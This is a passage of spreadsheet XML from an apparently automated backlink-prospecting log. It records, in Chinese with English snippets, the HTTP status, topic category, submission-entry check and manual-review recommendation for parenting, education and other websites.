      <x:c r="E88" s="20" t="str">
        <x:v>86</x:v>
      </x:c>
      <x:c r="F88" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G88" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H88" s="19" t="str">
        <x:v>https://www.roseclearfield.com/</x:v>
      </x:c>
      <x:c r="I88" s="19" t="str">
        <x:v>Rose Clearfield • Midwest lifestyle blogger.</x:v>
      </x:c>
      <x:c r="J88" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K88" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L88" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M88" s="19" t="str">
        <x:v>https://www.roseclearfield.com/</x:v>
      </x:c>
      <x:c r="N88" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O88" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P88" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q88" s="21" t="str">
        <x:v>Midwest lifestyle blogger. Rose Clearfield • Midwest lifestyle blogger. Skip to content Above Header Home About Me FAQ Subscribe Main Menu SHOP Menu Toggle Digital Ephemera Shop Vintage Music Prints Shop FREE PRINTABLES Menu Toggle Vintage Seasonal Holiday Home Decor ADOPTION Menu Toggle Our Adoption Story Infertility Waiting to Adopt Open Adoption PARENTING SEASONAL Menu Toggle Fall Menu Toggle Halloween Thanksgiving Winter Menu Toggle Christmas Menu Toggle Gift Guides New Years Valentine’s Day Spring Menu Toggle Easter Mother’s Day St. Patrick’s Day Summer Menu Toggle 4th of July Father’s Day DIY Menu Toggle Gift Ideas Greeting Cards Home Decor Mason Jars Sheet Music RECIPES Menu Toggle Original Recipes Healthy Eati</x:v>
      </x:c>
      <x:c r="R88" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S88" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T88" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://roseclearfield.com</x:v>
      </x:c>
    </x:row>
    <x:row r="89">
      <x:c r="A89" s="18" t="str">
        <x:v>88</x:v>
      </x:c>
      <x:c r="B89" s="19" t="str">
        <x:v>whitehacker.cn</x:v>
      </x:c>
      <x:c r="C89" s="19" t="str">
        <x:v>https://whitehacker.cn</x:v>
      </x:c>
      <x:c r="D89" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E89" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F89" s="20"/>
      <x:c r="G89" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H89" s="19" t="str"/>
      <x:c r="I89" s="19" t="str"/>
      <x:c r="J89" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K89" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L89" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M89" s="19" t="str">
        <x:v>https://whitehacker.cn</x:v>
      </x:c>
      <x:c r="N89" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O89" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P89" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q89" s="21" t="str"/>
      <x:c r="R89" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S89" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T89" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://whitehacker.cn
http://whitehacker.cn</x:v>
      </x:c>
    </x:row>
    <x:row r="90">
      <x:c r="A90" s="18" t="str">
        <x:v>89</x:v>
      </x:c>
      <x:c r="B90" s="19" t="str">
        <x:v>dalianlaowu.com</x:v>
      </x:c>
      <x:c r="C90" s="19" t="str">
        <x:v>https://dalianlaowu.com</x:v>
      </x:c>
      <x:c r="D90" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E90" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F90" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G90" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H90" s="19" t="str">
        <x:v>https://dalianlaowu.com/</x:v>
      </x:c>
      <x:c r="I90" s="19" t="str"/>
      <x:c r="J90" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K90" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L90" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M90" s="19" t="str">
        <x:v>https://dalianlaowu.com/</x:v>
      </x:c>
      <x:c r="N90" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O90" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P90" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q90" s="21" t="str">
        <x:v>Forbidden</x:v>
      </x:c>
      <x:c r="R90" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S90" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T90" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://dalianlaowu.com</x:v>
      </x:c>
    </x:row>
    <x:row r="91">
      <x:c r="A91" s="18" t="str">
        <x:v>90</x:v>
      </x:c>
      <x:c r="B91" s="19" t="str">
        <x:v>ffdc.com.au</x:v>
      </x:c>
      <x:c r="C91" s="19" t="str">
        <x:v>https://ffdc.com.au</x:v>
      </x:c>
      <x:c r="D91" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E91" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F91" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G91" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H91" s="19" t="str">
        <x:v>https://www.ffdc.com.au/</x:v>
      </x:c>
      <x:c r="I91" s="19" t="str">
        <x:v>Foundations Family Day Care</x:v>
      </x:c>
      <x:c r="J91" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K91" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L91" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M91" s="19" t="str">
        <x:v>https://www.ffdc.com.au/</x:v>
      </x:c>
      <x:c r="N91" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O91" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P91" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q91" s="21" t="str">
        <x:v>Foundations Family Day Care 0 Skip to Content About Us About Us Our Philosophy Child Safe Organisation Our Team Our Fees Employment Opportunities Our Community Grants Become an Educator Find an Educator Blog Portal Access Family Portal Educator Portal Staff Portal FFDC Shop Contact Us Open Menu Close Menu About Us About Us Our Philosophy Child Safe Organisation Our Team Our Fees Employment Opportunities Our Community Grants Become an Educator Find an Educator Blog Portal Access Family Portal Educator Portal Staff Portal FFDC Shop Contact Us Open Menu Close Menu Folder: About Us Back About Us Our Philosophy Child Safe Organisation Our Team Our Fees Employment Opportunities Our Community Grant</x:v>
      </x:c>
      <x:c r="R91" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S91" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T91" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://ffdc.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="92">
      <x:c r="A92" s="18" t="str">
        <x:v>91</x:v>
      </x:c>
      <x:c r="B92" s="19" t="str">
        <x:v>mommybabyplay.com</x:v>
      </x:c>
      <x:c r="C92" s="19" t="str">
        <x:v>https://mommybabyplay.com</x:v>
      </x:c>
      <x:c r="D92" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E92" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F92" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G92" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H92" s="19" t="str">
        <x:v>https://mommybabyplay.com/</x:v>
      </x:c>
      <x:c r="I92" s="19" t="str">
        <x:v>Mommy Baby Play - Activities, Books And Toys For Babies And Toddlers</x:v>
      </x:c>
      <x:c r="J92" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K92" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L92" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M92" s="19" t="str">
        <x:v>https://mommybabyplay.com/</x:v>
      </x:c>
      <x:c r="N92" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O92" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P92" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q92" s="21" t="str">
        <x:v>Activities, books and toys for babies and toddlers Mommy Baby Play - Activities, Books And Toys For Babies And Toddlers Menu Mommy Baby Play Search for Play Toys Books About Us Search for Recipes Svitlana June 13, 2021 1 Baby Broth Recipe {Delicious &amp; Easy To Make} Baby broth is one of the essential, very nutrition rich liquids that you can make for your baby at home.&amp;hellip; Read More &amp;raquo; Play Hannah March 17, 2023 0 DIY Superhero Masks For Kids {Perfect For Pretend Play} DIY superhero masks are a fun way of getting creative with our kids and producing something which can be used&amp;hellip; Read More &amp;raquo; Play Hannah February 18, 2023 0 Exciting Experiments With Ice Cubes For Toddlers It is always at the forefront of our minds what inte</x:v>
      </x:c>
      <x:c r="R92" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S92" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T92" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mommybabyplay.com</x:v>
      </x:c>
    </x:row>
    <x:row r="93">
      <x:c r="A93" s="18" t="str">
        <x:v>92</x:v>
      </x:c>
      <x:c r="B93" s="19" t="str">
        <x:v>rhythmsofplay.com</x:v>
      </x:c>
      <x:c r="C93" s="19" t="str">
        <x:v>https://rhythmsofplay.com</x:v>
      </x:c>
      <x:c r="D93" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E93" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F93" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G93" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H93" s="19" t="str">
        <x:v>https://rhythmsofplay.com/</x:v>
      </x:c>
      <x:c r="I93" s="19" t="str">
        <x:v>Rhythms of Play - Art, Crafts, DIY; Raising Creative Outdoor Kids</x:v>
      </x:c>
      <x:c r="J93" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K93" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L93" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M93" s="19" t="str">
        <x:v>https://rhythmsofplay.com/</x:v>
      </x:c>
      <x:c r="N93" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O93" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P93" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q93" s="21" t="str">
        <x:v>Arts and crafts, DIY projects, seasonal nature activities, and holiday celebrations that nurture the head, heart, hands, and spirit. Rhythms of Play - Art, Crafts, DIY; Raising Creative Outdoor Kids Skip to primary navigation Skip to main content Skip to footer If life is a school, the world is our playground! Subscribe Start Here Arts &amp; Crafts DIY Projects Celebrate Kids Activities Life with Kids Search Search Rhythms of Play Art, Crafts, DIY; Raising Creative Outdoor Kids Search Start Here Arts &amp; Crafts DIY Projects Celebrate Kids Activities Life with Kids Create space for what matters MOST! The QuickStart Guide will show you how to use the power of rhythm to help everyone THRIVE! GET MY FREE GUIDE NOW Looking for creative activities? I can help with that. Here’s what to do next: 1 Supplement learning at home or in the </x:v>
      </x:c>
      <x:c r="R93" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S93" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T93" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://rhythmsofplay.com</x:v>
      </x:c>
    </x:row>
    <x:row r="94">
      <x:c r="A94" s="18" t="str">
        <x:v>93</x:v>
      </x:c>
      <x:c r="B94" s="19" t="str">
        <x:v>lizzyhannaford.com.au</x:v>
      </x:c>
      <x:c r="C94" s="19" t="str">
        <x:v>https://lizzyhannaford.com.au</x:v>
      </x:c>
      <x:c r="D94" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E94" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F94" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G94" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H94" s="19" t="str">
        <x:v>https://lizzyhannaford.com.au/</x:v>
      </x:c>
      <x:c r="I94" s="19" t="str">
        <x:v>Maternity, Newborn &amp; Family Photography Cairns | Lizzy Hannaford</x:v>
      </x:c>
      <x:c r="J94" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K94" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L94" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M94" s="19" t="str">
        <x:v>https://lizzyhannaford.com.au/</x:v>
      </x:c>
      <x:c r="N94" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O94" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P94" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q94" s="21" t="str">
        <x:v>Relaxed, Fun &amp; Timeless Maternity, Newborn &amp; Family photography in Cairns. For people who know that time together is life's greatest luxury. Maternity, Newborn &amp; Family Photography Cairns | Lizzy Hannaford Skip to content Home I Maternity II Newborn III Family IV Blog V Contact VI Home I Maternity II Newborn III Family IV Blog V Contact VI Natural | Relaxed | Playful MATERNITY, NEWBORN &amp; FAMILY PHOTOGRAPHY For people who know that time together is life's greatest luxury ENQUIRE NOW meet the photographer lizzy Hello and Welcome! I’m Lizzy I’m a Cairns Maternity, Newborn and Family photographer creating connection-based photographs that feel playful, sentimental and fun. My sessions are intentionally calm and unhurried. Rather than expecting babies or children to perform, I follow their lead. With a background in child development,</x:v>
      </x:c>
      <x:c r="R94" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S94" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T94" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://lizzyhannaford.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="95">
      <x:c r="A95" s="18" t="str">
        <x:v>94</x:v>
      </x:c>
      <x:c r="B95" s="19" t="str">
        <x:v>pevanandsarah.com</x:v>
      </x:c>
      <x:c r="C95" s="19" t="str">
        <x:v>https://pevanandsarah.com</x:v>
      </x:c>
      <x:c r="D95" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E95" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F95" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G95" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H95" s="19" t="str">
        <x:v>https://www.pevanandsarah.com/</x:v>
      </x:c>
      <x:c r="I95" s="19" t="str">
        <x:v>Pevan &amp; Sarah | The home of Cub Club</x:v>
      </x:c>
      <x:c r="J95" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K95" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L95" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M95" s="19" t="str">
        <x:v>https://www.pevanandsarah.com/</x:v>
      </x:c>
      <x:c r="N95" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O95" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P95" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q95" s="21" t="str">
        <x:v>Pevan &amp; Sarah | The home of Cub Club Search Log in Videos Printables Creating positive memories in the classroom Try Cub Club for free 400+ educational videos with matching printables 80,000+ monthly views safe and ad-free platform The Pevan &amp; Sarah team are qualified teachers and experienced musicians who are passionate about creating fun, engaging and educational videos and resources for young learners. Try Cub Club for free Pevan &amp; Sarah are the BEST! I couldn't do each day in Prep without them.” Rach Prep Teacher “My class and I absolutely adore Pevan &amp; Sarah. We use their incredible videos in the classroom every day.” Libby Prep Teacher Monthly Annual Individual Join as an individual us</x:v>
      </x:c>
      <x:c r="R95" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S95" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T95" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://pevanandsarah.com</x:v>
      </x:c>
    </x:row>
    <x:row r="96">
      <x:c r="A96" s="18" t="str">
        <x:v>95</x:v>
      </x:c>
      <x:c r="B96" s="19" t="str">
        <x:v>sticksandstoneseducation.com.au</x:v>
      </x:c>
      <x:c r="C96" s="19" t="str">
        <x:v>https://sticksandstoneseducation.com.au</x:v>
      </x:c>
      <x:c r="D96" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E96" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F96" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G96" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H96" s="19" t="str">
        <x:v>https://www.sticksandstoneseducation.com.au/</x:v>
      </x:c>
      <x:c r="I96" s="19" t="str">
        <x:v>Sticks &amp; Stones Education</x:v>
      </x:c>
      <x:c r="J96" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K96" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L96" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M96" s="19" t="str">
        <x:v>https://www.sticksandstoneseducation.com.au/</x:v>
      </x:c>
      <x:c r="N96" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O96" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P96" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q96" s="21" t="str">
        <x:v>An educational toy store with a wide range of toys and educational resources for the children in your lives. A curated collection of quality toys. Sticks &amp; Stones Education Skip to content FLATRATE POSTAGE $12.99 || FREE SHIPPING ORDERS OVER $250 || ESTABLISHED 2014 || SYDNEY NSW Search Search our store Log in Create an account 0 Search Search Search our store HOME EYLF MILESTONES e-BOOK 2026 CHILD CARE CALENDAR PRINTABLE CALENDAR COLLECTIONS PLAY ANIMALS BOTANICALS ART &amp; CRAFT BLOCKS TUFF TRAYS NATURALS CONNETIX TILES DINOSAURS FAIRY GARDEN FAIRY PLAY FELT TOYS LOOSE PARTS PAPOOSE TOYS PLAY DOUGH + CLAY PLAY DOUGH KITS PLAY FOOD PLAY SILKS SENSORY FIDGETS SENSORY PLAY SMALL WORLD PLAY PLAY THEMES ANIMALS AUSTRALIANA BUGS, BEES, MINIBEASTS CRYSTALS, GEMS, GEMSTONES DINOSAURS FAIRIES MERMAIDS PLANETS + SPACE RAINBOWS TRANSPORT PLAY PIRA</x:v>
      </x:c>
      <x:c r="R96" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S96" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T96" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://sticksandstoneseducation.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="97">
      <x:c r="A97" s="18" t="str">
        <x:v>96</x:v>
      </x:c>
      <x:c r="B97" s="19" t="str">
        <x:v>skillshoster.com</x:v>
      </x:c>
      <x:c r="C97" s="19" t="str">
        <x:v>https://skillshoster.com</x:v>
      </x:c>
      <x:c r="D97" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E97" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F97" s="20"/>
      <x:c r="G97" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H97" s="19" t="str"/>
      <x:c r="I97" s="19" t="str"/>
      <x:c r="J97" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K97" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L97" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M97" s="19" t="str">
        <x:v>https://skillshoster.com</x:v>
      </x:c>
      <x:c r="N97" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O97" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P97" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q97" s="21" t="str"/>
      <x:c r="R97" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S97" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T97" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://skillshoster.com
http://skillshoster.com</x:v>
      </x:c>
    </x:row>
    <x:row r="98">
      <x:c r="A98" s="18" t="str">
        <x:v>97</x:v>
      </x:c>
      <x:c r="B98" s="19" t="str">
        <x:v>mrspriestleyict.com</x:v>
      </x:c>
      <x:c r="C98" s="19" t="str">
        <x:v>https://mrspriestleyict.com</x:v>
      </x:c>
      <x:c r="D98" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E98" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F98" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G98" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H98" s="19" t="str">
        <x:v>https://mrspriestleyict.com/</x:v>
      </x:c>
      <x:c r="I98" s="19" t="str">
        <x:v>Mrs Priestley ICT</x:v>
      </x:c>
      <x:c r="J98" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K98" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L98" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M98" s="19" t="str">
        <x:v>https://mrspriestleyict.com/</x:v>
      </x:c>
      <x:c r="N98" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O98" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P98" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q98" s="21" t="str">
        <x:v>Mrs Priestley ICT Skip to content Check out our last chance resources collection with epic discounts Menu Main menu Close (esc) Resources Shop New Best Sellers Freebies Bundles Last Chance Resources Learning Areas English ICT &amp; Technology Inquiry Maths Year Level New Entrants 1 - 2 3 - 4 5 - 6 Type Digital Physical Decor Packs Crafts Admin Planning Templates Assessment Stationery Other Gift Card Structured Maths Approach Tribe Membership 1 on 1 with Mrs P Teacher Zone The Teacher Zone Teacher Zone community Tribe Membership Work with Jordan Structured Maths Approach About Background Contact FAQ's Log in Create account Search Search Resources Shop New Best Sellers Freebies Bundles Last Chance</x:v>
      </x:c>
      <x:c r="R98" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S98" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T98" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mrspriestleyict.com</x:v>
      </x:c>
    </x:row>
    <x:row r="99">
      <x:c r="A99" s="18" t="str">
        <x:v>98</x:v>
      </x:c>
      <x:c r="B99" s="19" t="str">
        <x:v>gogonow.de</x:v>
      </x:c>
      <x:c r="C99" s="19" t="str">
        <x:v>https://gogonow.de</x:v>
      </x:c>
      <x:c r="D99" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E99" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F99" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G99" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H99" s="19" t="str">
        <x:v>https://gogonow.de/</x:v>
      </x:c>
      <x:c r="I99" s="19" t="str">
        <x:v>GoGoNow</x:v>
      </x:c>
      <x:c r="J99" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K99" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L99" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M99" s="19" t="str">
        <x:v>https://gogonow.de/</x:v>
      </x:c>
      <x:c r="N99" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O99" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P99" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q99" s="21" t="str">
        <x:v>GoGoNow ist ein neues Tor ins Internet. Mit GoGoNow bewegst du dich sicher im Internet und kannst alle wichtigen Inhalte sehen. GoGoNow</x:v>
      </x:c>
      <x:c r="R99" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S99" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T99" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://gogonow.de</x:v>
      </x:c>
    </x:row>
    <x:row r="100">
      <x:c r="A100" s="18" t="str">
        <x:v>99</x:v>
      </x:c>
      <x:c r="B100" s="19" t="str">
        <x:v>ciba.cl</x:v>
      </x:c>
      <x:c r="C100" s="19" t="str">
        <x:v>https://ciba.cl</x:v>
      </x:c>
      <x:c r="D100" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E100" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F100" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G100" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H100" s="19" t="str">
        <x:v>https://www.ciba.cl/</x:v>
      </x:c>
      <x:c r="I100" s="19" t="str">
        <x:v>CIBA</x:v>
      </x:c>
      <x:c r="J100" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K100" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L100" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M100" s="19" t="str">
        <x:v>https://www.ciba.cl/</x:v>
      </x:c>
      <x:c r="N100" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O100" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P100" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q100" s="21" t="str">
        <x:v>CIBA Procedimientos de toma de muestras y envío Centro de ayuda Soluciones diagnósticas para la acuicultura Descubre más add Conoce Nuestros servicios En CIBA, ofrecemos soluciones diagnosticas altamente efectivas enfocadas en la salud de los peces. Estamos comprometidos en brindar estudios y análisis eficaces para la prevención y control de enfermedades. Servicios de Laboratorio arrow_forward Servicios veterinarios arrow_forward Investigación Aplicada arrow_forward Otros Servicios arrow_forward Acerca de Nosotros Hace más de una década el Centro de Investigaciones Biológicas Aplicadas (CIBA), fue concebido como un faro de conocimiento e innovación en el campo de la acuicultura. Nuestro prop</x:v>
      </x:c>
      <x:c r="R100" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S100" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T100" s="21" t="str">
